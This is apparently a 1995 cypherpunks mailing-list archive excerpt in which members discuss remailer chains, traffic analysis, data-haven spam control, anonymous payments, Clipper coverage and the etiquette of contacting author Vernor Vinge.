of this. But I'll yap away anyway.

Off the cuff, I'd say your article could be inappropriate. Granted
it's a good cause, and you're not advertising for yourself but for a
charity. However, charitable spam is still spam (and I'm not calling
your article spam... spam lite, maybe). I understand your point about
feeling a sense of community with the above groups; however, I think
that massive "Please help..." postings can be just as annoying as the
MAKE.MONEY.FAST postings.

					Erik Selberg
"I get by with a little help		selberg@cs.washington.edu
 from my friends."			http://www.cs.washington.edu/homes/selberg




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 8 Jan 95 19:27:03 PST
To: jRT <jrt@asiaonline.net>
Subject: Remailer security
In-Reply-To: <Pine.SUN.3.91.950109054255.21650A-100000@asiaonline.net>
Message-ID: <Pine.SUN.3.91.950108182612.5411B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, jRT wrote:
> 
> The thing being, say you set up an anonymous-video-or-otherwise-remailer, 
> you have to ensure that people don't manage to get into that as such 
> would obviously give away the identities of all parties.  Given that 
> people can supposedly hack the DOD computer system, that doesn't seem so 
> unlikely, so are anonymous-remailers really all that safe?

This is why you want to use a remailer chain instead of just one remailer.
Hopefully, not all of the remailers in your chain are subverted by your 
enemy.  (They may all be subverted, but as long as not by people who 
cooperate with your enemy you're still ok :-)  Also, make your chains as 
heterogeneous as possible.  That is, include remailers that use different 
hardware, operating systems, remailer softwares, are in different 
countries, are controlled by different organizations, etc., so that one 
security hole will not compromise your entire chain.

I've kinda evaded the original question, which is about the (average?) 
security of the individual remailers.  Does anyone have a real answer?

Wei Dai
PGP encrypted mail welcome.  (I realize a PGP signature says this 
implicitely, but I left my key in another computer.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 8 Jan 95 18:41:03 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501021344.FAA11566@largo.remailer.net>
Message-ID: <Yr94lKjqRqWD075yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501021344.FAA11566@largo.remailer.net>, you wrote:
>    From: skaplin@skypoint.com (Samuel Kaplin)
>
>    I was looking at at the bigger picture. Any merchant who accepts Visa or MC
>    could now accept anonymous payments. No hassle at all on their part.
>    [...]
>    The key
>    would be not to have the card attached to the account. If the card is
>    attached to any type of account, then there are reporting requirements.
>
> Visa was talking about an electronic traveller's check, which, from
> what I could tell, instantiated an account in the sum of the value of
> the card purchased, which was then drawn down by purchase.  The card,
> evidently, had no embossing on it.  Personalization was limited to
> some account id which would last the lifetime of the balance and then
> disappear.

This is EXACTLY what I was contemplating. I really wish they would
implement it. Then I can get the traveler's cheques out of my wallet.
(unsigned in both spots of, course.)

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
                 Be careful when playing under the anvil tree.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLxCfB8lnXxBRSgfNAQH6yAf/RMSqUXOHouTE3qKqaU/naHO8fdr8cEKL
EjAemhDQj5yVHeTz4YCT1p16CW8X+++fTXGsfZoCr7c+xxYoj/04OVC/u3UPvpJy
kAtwhbZhIG7ndKk2weoxZLTnxl5TVlkYjZUrufSccUw0ZfA6h27WrZNV7jFV89dk
c2xPr9oJ8dj/jwJtaNIR2KtTc9THWyxlGEIBzMn4mA1VeFz0I27uPK9RSs0M4eXb
JCW/ns92Gzwslq0/3n7d4JctGXar+9cUTjowPYRXinKX7wsyoKj5nN7HrCo8D5ot
W0KCfDzkn2YOGCj1CzkRkcW0wiGXI9kBXpCQVXJFlKZ6r7d5QnN0AA==
=B73o
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 18:18:53 PST
To: mkj@october.ducktown.org
Subject: Re:  The Value of Anonymity
Message-ID: <9501090217.AA13075@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Hear, hear!  mkj's article on anonymity is worth reading.

From my perspective, the most important thing cryptography offers us
is not just the ability to have private conversations without eavesdroppers;
it's the ability to change the balance of power from the centralized
control and accumulation of information that computers bring back
to a level where _you_ can control what happens to your personal data.

Do you _like_ starting transactions by giving some big company your
Social Security Number which lets them, and everyone else, know
everything you've ever done, where you live, how you vote, what you buy?
We can move to a society where you can give the other party as much
information as they need to do business with you, without having to 
give them everything else, or connect this transaction to all your others.
Sometimes that means giving people more detail than you give them now, 
usually less.  Cryptography becomes the technical glue to control 
how much you tell somebody on each transaction, anywhere from total
anonymity to deep personal information, to let you have a driver's license
that says "yes this person is a safe driver" without it becoming
the key to your bank account of you lose your wallet, to have voter's
registration that doesn't permit fraud but doesn't require universal
identification.

Some good technical references are the set of papers that David Chaum
published about blind signatures and anonymous credentials.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 8 Jan 95 19:53:13 PST
To: Dave Del Torto <ddt@lsd.com>
Subject: Vinge's _A Fire Upon the Deep_
In-Reply-To: <ab32340f410210037a5d@[192.187.167.52]>
Message-ID: <Pine.SV4.3.91.950108224048.17345C-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you
> and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze
> mail me. First book of his I've read, first of it's kind I've enjoyed in a
> very long time. I'll scan my favorite crypto-related (legal-length) excerpt
> and post it next week, howzat?

   Ditto that.  I've enjoyed all of his works.  He's one of my top three 
favourite SF writers of all time.

   Any of you who are in contact with VV have an e-mail address for him?  
He deserves accolades, but snailmail is too slow for my liking.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 19:54:12 PST
To: weidai@eskimo.com
Subject: Re: Latency, bandwidth, and anonymity
Message-ID: <9501090353.AA13655@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


My initial reaction to "Anonymous video conferencing" was
"That's when you wear black ski masks and use voice scramblers
and call from video payphones", i.e. not very useful.
("Subcomandata Marcos here...")

On the other hand, Wei Dai's followup message about
> In the longer term, anonymous communication is in danger of being used
> only by fringe groups if it falls too much behind the non-anonymous kind
> in terms of latency and bandwidth (and cost, I guess).  Maybe ONLY drug
> dealers, nuclear terrorists, etc., will use anonymous remailers when full
> sensory virtual interaction is the must popular way for most people to
> communicate and remailers are still the only choice for the
> anonymity-conscious.
puts a different spin on it.  It's a real problem, if not now, then
maybe in 5-10 years.  I realize that those of us in the Phone Company
who have predicted universal Picturephone in the past have been 
over-optimistic :-), but the video compression people and the faster-chip
people keep bringing us closer to having good-quality low-bandwidth video,
and ISDN and fast modems are bringing available loop-end bandwidth up
to the point that reasonably-priced circuits can carry it.  (Long-haul
raw bits have been cheap enough for a while; it's the distribution
and switching technology that have a lot of the cost, and providing
cheap high-bandwidth circuits makes it hard to make money on voice calls.)

The approaches to anonymous video conferencing will depend a bit
on whether the technology takes off on the nets or the phone system,
if those two are still different by then.  It's easier to obscure
the origins of a call on the nets, where users own large parts,
than it is on the phone system, where the Phone Companies own
and operate most of it; the latter environment would require
Phone Remailers, such as PBXs you call into on T1 lines and get
shuffled out on other circuits - it's hard to get adequate mixing
except in rather large environments....  Recircuiting on the nets
will be left as an excercise to the reader.

I suspect the harder parts of the job may be doing the faces and 
voices right - anonymous voice conference bridges are ok if the
participants mostly don't know each other, but they're less useful
if people know each other and cops with computerized voiceprint equipment
may be eavesdropping (not common now, though computers and models of
the human voice are improving; I suppose voice disguisers may improve
from the kid's-toy quality to something better if there's a market,
or if computers with full-duplex soundcards become more common.)

Faces are harder, and they're not really a crypto problem -
how do you fake them well?  It's not too hard to do a "quayletool"
quality solution that generates moving lips in front of a static
picture, even timed with an audio feed, but that won't play too well
in the business world, and having the camera pointing at your calendar
or home page is only semi-useful.  If video-calling evolves on the nets,
there'll be a lot more need for speed-matching services, and it may
be that computer-enhanced video receiving for high-bandwidth users
will fund the technology development for face-simulation?
If so, maybe you can use it to start with fake stills instead of 
real ones?

				Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 20:49:40 PST
To: dfloyd@io.com
Subject: Re:  Data Haven problems
Message-ID: <9501090448.AA14477@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


dfloyd asks for ideas about preventing spamming in data havens,
for the code that he's working on.  It's a hard job.
A related problem is how to prevent your data haven from becoming
the porno-ftp site of the week, and either being swamped with
traffic or raided by the Post Office Reactionary Neighborhood Police.

One way to stop spamming is to charge sufficient money for the service
that using it always pays for itself - spamming is then reduced
to a source of profit, e.g. no problem.  If people want to  hire
you to store spam, it's their money they're wasting.  But that
requires an anonymous digital cash infrastructure, which we don't
really have yet.  And it's a lot less interesting academically (:-)
than finding solutions which can also work in a cooperative system,
or at least a system that doesn't charge per transaction.

Probably the most important step you can take is to build in
operator-selectable filtering, because the problems keep changing.
Operators probably need to be able to block storage and retrieval
by specific users and sites (It's easier to prevent access by 
president@whitehouse.gov than it is to detect forged requests, 
and you probably want to keep both real and fake Cantor&Siegel users off,
plus the bozo of the month and the broken-remailer of the day.)
Some operators may find it useful to limit the amount of data
that can be stored or retrieved by a specific user or site, 
though this is less useful with anonymous and pseudonymous remailers
around, since "a specific user" becomes vaguer.

Filtering by filename and type can also be useful - if you don't allow
files named *.gif and *.jpg, users may be less likely to
spam you with pornography.  Namespace control in general is an issue -
do users get to choose filenames, or list directories, or do they
have to know the names of files to retrieve. 
Another issue is whether files can only be retrieved by the sender -
probably a local policy issue.  

Some sites may only accept encrypted files, which reduces the spam 
potential considerably, as well as reducing your exposure to the
porn police, though it's difficult to do anything about files that are
encrypted with a public key whose private key has been posted to the net,
or fake crypto headers in an otherwise unencrypted file,
unless you put in lots more code to check the insides of files and
watch the net for such postings, which is unrealistic.  There's also
the problem that PGP and especially RIPEM files are non-stealthy,
and users may not want to leave even keyids in their files.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 9 Jan 95 00:04:06 PST
To: "L. Todd Masco" <cactus@seabsd.hks.net>
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501090729.CAA28854@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950108234702.25620E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, L. Todd Masco wrote:

> Sigh.  Please don't use this, people.  I'm sure VV has no desire to 
> pay for oodles of mail telling him just how much people like him.  Treat
> it like a home phone number (of course, some people abuse home phone
> numbers of famous folks...).

A general hint for finding authors' e-mail addresses: figure out where 
he/she works from the book jacket, use WHOIS to find their domain name, and 
then finger them or look at their web page to see if they have an e-mail 
directory.  (Now keep this a secret!  I don't want the internet.masses to 
find out my e-mail address when I become rich and famous! :-)

I bet Vinge has written for himself a really intelligent filter like the 
kind he describes in AFUtD.  Of course I wouldn't want to test this.

I guess this is not really related to cypherpunks, except to the general 
philosophy of making tools to protect oneself, instead of relying on the 
good will (and intelligence) of others.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 21:09:23 PST
To: cypherpunks@toad.com
Subject: Re:  Can someone verify this conjecture for me?
Message-ID: <9501090508.AA14605@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: nelson@crynwr.com (Russell Nelson)
> > It seems like it solves two separate problems: 1) foiling traffic
> > analysis, and 2) foiling a cheater remailer.  The problems are
> > separate, really, because if you really, really trust the remailer (as
> > many people do Julf), then 2) isn't a problem.  All you need to do is
> > solve 1.  Or, you can solve 1) by using a single remailer.  A
> > necessary but not sufficient step to foil traffic analysis is to strip
> > headers.

There are a couple of advantages of chaining multiple remailers.
One is that traffic analysis is an art, rather than a science,
and to really foil it, you've got to know how good it is, which is hard.
Long-term patterns may show up even though the traffic mixes
are pretty good in the short run, and if you can spread out the remailer
use and increase the traffic load, plus constantly sending encrypted
traffic between remailers, it does make the job harder.
If the Bad Guys can isolate their target to a few remailer users,
they can often find the real one by rubber-hose or a small number
of wiretaps at the user locations instead of the remailers;
that's impractical if there are thousands of potential users in
multiple countries across the remailer-chain.

Another is that if one good trustable remailer can foil traffic
analysis, then multiple remailers increases the chance that
at least one of them is good.  Sure, Julf's a good guy, but what
if the KGB has kidnapped his grandmother, or the CIA has planted
wiretaps inside his computer - will you know if it's compromised?

There's also the reliability issue - what if the Finnish Phone Company
decides Julf is using too much of their resources and cuts him off,
or the Mafia steals one of your police-informants' remailers,
or the California Public Utilities Commission declares email to be
a common carrier and insists on auditing all transactions?
Multiple remailer in a strongest-link chain reduce the risks.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@garnet.msen.com>
Date: Sun, 8 Jan 95 21:16:53 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Vinge's True Email name ?
In-Reply-To: <Pine.SV4.3.91.950108224048.17345C-100000@xcalibur>
Message-ID: <Pine.BSI.3.91.950109001111.9299A-100000@garnet.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


I knew that old compuserve account was good for something.
They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 9 Jan 95 00:46:58 PST
To: lmccarth@ducie.cs.umass.edu (L. McCarthy)
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501090800.DAA29142@bb.hks.net>
Message-ID: <199501090847.AAA23833@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:

> I began composing a reply precisely to this effect, but was stopped by the
> words "They list...". If the address appears in some standard Compu$erve
> email directory, then this was hardly a major transgression.
> 
> Allow me to suggest a compromise. If some enterprising VV fan would volunteer
> to collect fan mail from c'punks, then forward it all, everyone involved
> might be fairly satisfied.

As I described in a post last summer, I was at a party that Vernor was
at, and several of us stayed over until Sunday afternoon (it being
deep in the mountains of Marin and all, a long drive)). Eric Hughes
was there. Anyway, I talked about all this in that post.

Vernor was there until Sunday night, too, when the party hosts drove
him off to SFO (the airport, for the TLA-impaired) and I dropped Eric
off in Berkeley on my way home to Santa Cruz.

The point I'm making? First, Vernor had gotten some Cypherpunks posts
forwarded to him by that time, mostly by Russell Whittaker. He is
well-aware that the Cypherpunks list exists, and one must presume that
if he wanted to be on the list, he could be on it easily. (I doubt his
CompuSlave account is his only one, as he's on the faculty at San
Diego State, and hence has the usual access. I suspect he uses the
CompuServe account for his rec.arts.sf-lovers sort of mail; just a hunch.)

Second, he was aware of--and generally pleased by--the explicit role
"True Names" played in the early motivation for our activities. (As is
well known, the works of Chaum, Vinge, Card, Stephenson, Brunner, and
others played major roles.)

Third, for the curious, he _is_ working on a sequel to "AFUTD."

Contact him if you wish, but bear in mind that the more time he has to
spend reading and answering e-mail, the less work he'll get done on
his SF writing.

(And if he has to spend many hours getting his HyperMIME-JPEG3 SLIP
system running to see "Vernor Rulez!" in 80-point type, he may truly
decide he's been marooned in realtime.)

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 9 Jan 95 00:56:36 PST
To: wcs@anchor.ho.att.com
Subject: Re: Latency, bandwidth, and anonymity
In-Reply-To: <9501090353.AA13655@anchor.ho.att.com>
Message-ID: <Pine.SUN.3.91.950109002529.25620G-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Jan 1995 wcs@anchor.ho.att.com wrote:

> My initial reaction to "Anonymous video conferencing" was
> "That's when you wear black ski masks and use voice scramblers
> and call from video payphones", i.e. not very useful.
> ("Subcomandata Marcos here...")

Video conferencing was just ONE of the applications of high-bandwidth, 
low-latency anonymous communication.  Maybe it was a bad example.  Here's 
a couple more:

1.  anonymous distributed computing: suppose Alice wants to help Bob 
crack a secret key by using both of their computers, but the algorithm 
entails some heavy exchange of data between them

2.  anonymous remote consulting: Alice is building a nuclear bomb and 
needs help, so she sends a live video feed of her workshop to Bob (and 
have the computer blot out her face in real time).  Bob sends Alice an audio 
only commentary of what Alice is doing wrong.

We tend to focus on the more exotic applications of these tools, but as
mjk pointed out they will have perfectly ordinary uses by people who
simply don't want everyone in the world to be able to know everything
about them. Maybe Alice just wants to call AT&T to ask about their Clipper
phone, and not have everybody realize that and send her a bunch of
propaganda about Voice PGP.  :-) Even now, this may not be as implausible
as it sounds.  What if Alice is using MCI as the long distance carrier,
and MCI happens to be selling Voice PGP? 

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (L. Todd Masco)
Date: Sun, 8 Jan 95 23:23:39 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
Message-ID: <199501090729.CAA28854@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.BSI.3.91.950109001111.9299A-100000@garnet.msen.com>,
Lou Poppler <lwp@garnet.msen.com> wrote:
>I knew that old compuserve account was good for something.
>They list Vinge, Vernor  San Diego CA   72267.2656@compuserve.com

Sigh.  Please don't use this, people.  I'm sure VV has no desire to 
pay for oodles of mail telling him just how much people like him.  Treat
it like a home phone number (of course, some people abuse home phone
numbers of famous folks...).
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxCrChNhgovrPB7dAQF7VgQAqsDQM0h7b0VDmBISGd3o0YqYg4q2HYmQ
m0g7VtnX3yEU1vi9N96HPilMwe2JGs/6Frlvf9IKMmzGAIJxEQzGdMLbow54Il1/
akV9siQAH7BvKwaEWkzO8dDi6nl83ZtawVXIQNacIb5v9oEIQwK/vw4aYWitmDAv
B0eJJUVT1XI=
=u+fn
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxDlzSoZzwIn1bdtAQEXTwGAqVqaYnu+0yy8/d0HSZseTDuxP7BBWqGb
PuzL4Xpu2HE7DDrIaALalplmGIYrHnun
=zr9V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 8 Jan 95 23:54:29 PST
To: cypherpunks@toad.com
Subject: Re: Vinge's True Email name ?
Message-ID: <199501090800.DAA29142@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

NOTE: This mutation of this thread has no crypto content, but some (awfully
specific) privacy relevance.

Todd Masco writes:
> Lou Poppler <lwp@garnet.msen.com> wrote:
> >I knew that old compuserve account was good for something.
> >They list Vinge, Vernor  San Diego CA   [email address omitted]
> Sigh.  Please don't use this, people.  I'm sure VV has no desire to 
> pay for oodles of mail telling him just how much people like him.  Treat
> it like a home phone number (of course, some people abuse home phone
> numbers of famous folks...).

I began composing a reply precisely to this effect, but was stopped by the
words "They list...". If the address appears in some standard Compu$erve
email directory, then this was hardly a major transgression.

Allow me to suggest a compromise. If some enterprising VV fan would volunteer
to collect fan mail from c'punks, then forward it all, everyone involved
might be fairly satisfied.

Disclaimer:
I'm not familiar with the details of CI$'s fee schedule; if one pays by sheer
volume and not number of messages, then obviously this approach won't alleviate
the burden. Maybe then someone could volunteer actually to ask VV whether/how
he'd like to hear from fans....

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxDr62f7YYibNzjpAQGxAwP+LloeLQS/BJcZciApmMWEvmOhSaCQJX8u
uuwzprP2ZYTmbsb08lfTHnofS1TXKmoZ3BrYdiqjugaCTKFweg8BSZ2vw5i6KplV
x2ArBnejYPKjtqs3C12mf8WJrgjnKdMZ9LxLgjlE1ymELG1bhH0loIyq3YX3x46G
69hvZyz/qQ8=
=h05K
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxDtAyoZzwIn1bdtAQHLNAF+LEFF+UniR9jrXSZxd6Ia9L5aJIXjFFt3
J9aUAIUQKXf0o5ytM2nHYUvj7v0cWhn6
=e+gV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Mon, 9 Jan 95 00:31:37 PST
To: cypherpunks@toad.com
Subject: More signal than YOU can handle.
Message-ID: <199501090837.DAA29692@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


For the moment, all of the archives that Eric just dropped me are on
ftp://ftp.hks.net/cypherpunks/All

I'll be making some primitive engines to access individual articles by
various means but I thought I'd put 'em up in case anybody else with more
disk space than brains would like to snarf 'em (following the Shulgin
model).

(By the way, Glimpse looks like it'll be ideal, since everything is
 already in its own file, the "since June" archive currently being
 our /usr/spool/news/... dir.)

Look for more info in this space (that sucking sound is my copious
free time).
- - --
Todd.

- -----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLxD1GBNhgovrPB7dAQEOQAQAuTRIVTQOzIbjqrUAFsPu3xHTJAH+3YnX
ickYtw627leo3vs7wD2rxGfHNx6As7JbzSI1JwD26zsb2CMqMGgvQHNQ5eD7rW/N
3ICSWACwESWlnL/rAFvVh69mZDM/IUv5C+eSTVHKdlh3KWYbetRvCgkRNQvGVl58
S06pthGBpJ8=
=f4fe
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxD1nyoZzwIn1bdtAQEv7wGAhSVywzGivjeo9fZwVrYDRaJx596TPVeJ
pjutyvubg3yyKmqFD+Ele62LhiPvhxtX
=pooh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 9 Jan 95 01:27:51 PST
To: cypherpunks@toad.com
Subject: PV Advocate on Clipper in `95
Message-ID: <199501090933.EAA03532@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Just ran across a pretty nice (IMHO) short piece of media coverage of Clipper
in a local weekly, the [Pioneer] Valley Advocate. This is item #85 in the "Tech
Check" section of their list of "95 Things to Watch for in 1995". Joint authors
of the whole forecast are: Mark Kendall Anderson, Everett Hafner, Stephanie 
Kraft, Tom Mudd, Steve Penhollow, Chris Rohmann, David Simons, Michael Strohl,
and Rob Weir.

  ------------------ begin included text ----------------------
85. Clipper Clipping Along

Unfortunately, the failure of the mainstream media to cover the government's
steamroller tactics in technology policy may well continue. The ``Clipper 
Chip,'' what NSA, CIA and FBI spooks see as the ideal data protection measure,
stands to become national standard if all goes as planned. That is, as more
people communicate with digital devices (computers and TVs and eventually
telephones and faxes) the need to scramble and unscramble communications will
increase -- ideally so that the phone conversation you have with your uncle or
the email you send to a co-worker is private and unintelligible to anyone else.
However, in the brave new world as it currently is being designed, the feds
will also be able to decode every digital signal the Clipper chip scrambles.
Consequently, drug kingpins, mafiosi, and anyone else requiring secure
communications will have it (real data encryption is cheap and relatively easy
to implement), while the remaining information consumers will have Big Brother
to contend with.
  --------------------- end included text ----------------------

FYI, the Advocate accepts letters at 71632.100@compuserve.com.

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLxEBwmf7YYibNzjpAQFdkgQAkciJkPMXESO9yvl3jKaH7WT6H4wGcgfG
W8KyX2myH1zOmN/aZAQVSWX/Rtrs3r+gTwIlCf7DVhFnp1n+lImzrs/T8pKTx/25
gh30s6sm0AGrxcxCV8rgKbXT4KCdPOlXT+kTp5wWaLYBqbZlogvyQIivW3GLZ1U/
9YnjTb0OXNk=
=DaLq
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxEC7CoZzwIn1bdtAQEl6AGAtktxeMXLzVqxHi/0qhEgGRtlCg5Oq/aa
O/RrNyyqbV8eKzSr/n06bt98bGfRfbgY
=ullh
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Sun, 8 Jan 95 13:46:50 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950107103037.10733D-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.950109054255.21650A-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



When we say 'anonymous video-conferencing' here, I take it that's not the 
same as in videophones whereby you sit there and have your mugshot 
transmitted across to the other party... that would be distinctly 
un-anonymous :)

The thing being, say you set up an anonymous-video-or-otherwise-remailer, 
you have to ensure that people don't manage to get into that as such 
would obviously give away the identities of all parties.  Given that 
people can supposedly hack the DOD computer system, that doesn't seem so 
unlikely, so are anonymous-remailers really all that safe?

------------------------------------------------------------------------------
 jrt@AsiaOnline.Net   john@AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.

  Computers   Communications  Reduced Rate IDD Service   Innovative Widgets

 Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------

On Sat, 7 Jan 1995, Wei Dai wrote:

> On Sat, 7 Jan 1995, Adam Shostack wrote:
> > 	Anonymous mail has bandwidth costs that are only slightly
> > higher than regular mail.  You could hide quite a bit in most video
> > packets.  The latency is a reflection of the lack of volume, because
> > volume is needed for reordering.  If your favorite remailer gets more
> > mail, the latency will drop.
> 
> Anonymous e-mail that goes through a chain of N remailers will cost at
> least N times as much bandwidth and have N times as much latency as normal
> e-mail.  But e-mail is hardly the state-of-the-art of network
> communication, while anonymous e-mail IS the state of the art for
> anonymous communication.  How long will it take for the technology of
> anonymous video conferencing to develope, for example?  By then, of
> course, those who are not concerned with anonymity will probably have
> things such as full sensory virtual interaction. 
> 
> Note that I SUPPORT anonymous communication, but its costs of bandwidth 
> and latency may be a real obsticle to developing Cryptoanarchy (of the 
> kind described by Tim May) if most people are not willing to put up with 
> those costs.
> 
> Wei Dai
> PGP encrypted mail welcome.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jRT <jrt@asiaonline.net>
Date: Sun, 8 Jan 95 13:48:45 PST
Subject: Re: ANONYMOUS REMAILERS
In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.950109054852.21650B-100000@asiaonline.net>
MIME-Version: 1.0
Content-Type: text/plain



Oops, what I meant to add onto that last bit was that if you're required 
to keep records of the to and from, and especially the contents, you are 
severely likely to be raided by some govt agency whenever they wanna see 
who said what.

I'd think twice about using a remailer that kept records on it all.

------------------------------------------------------------------------------
 jrt@AsiaOnline.Net   john@AsiaOnline.Net   PO Box 86141, Govt PO, Kln, HKG.

  Computers   Communications  Reduced Rate IDD Service   Innovative Widgets

 Help protect the environment : This message is made from recycled electrons
------------------------------------------------------------------------------





